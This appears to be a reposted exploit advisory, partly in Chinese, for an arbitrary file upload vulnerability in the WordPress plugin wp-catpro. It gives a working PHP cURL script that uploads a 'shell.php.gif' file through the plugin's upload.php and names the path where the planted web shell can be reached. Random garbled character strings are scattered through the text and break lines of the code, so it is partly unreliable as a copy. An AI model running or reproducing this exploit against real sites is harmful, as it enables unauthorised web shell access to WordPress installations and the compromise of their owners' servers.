WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
! }1 x* {7 q5 W' t测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
5 A2 X7 {& F$ \- Q( H5 U) ?$ q$ I
#=> Exploit 信息:
* G2 k: e) b! |0 N5 y------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
2 e1 C7 m6 F, s, }, Z0 f* P9 U# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
6 V7 S# q( z0 N; N: ?, r; f------------------

#=> Exploit
0 c$ s6 m4 N4 s) B4 i-----------
, ~1 n# Q# @6 x' s9 t<?php
  \3 z5 X, l3 r2 [: I  n) M
$uploadfile="zik.php.gif";
; i+ I7 Z6 z, ~$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
3 ^5 Q% l( ?7 F. }6 k6 [curl_setopt($ch, CURLOPT_POSTFIELDS,
6 X6 P9 N& v* @( |5 e( E$ n( Sarray('Filedata'=>"@$uploadfile",
1 t0 D2 d. c( _'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
0 }; v! `: f# |; e% f$postResult = curl_exec($ch);
curl_close($ch);

' i' @4 [+ M5 @5 H! ?% [print "$postResult";
* l; }+ ], T: O) n/ T8 @) K
" |% p  i3 O: y8 GShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
! Q0 e  u# b) }, h  Wphpinfo();
?>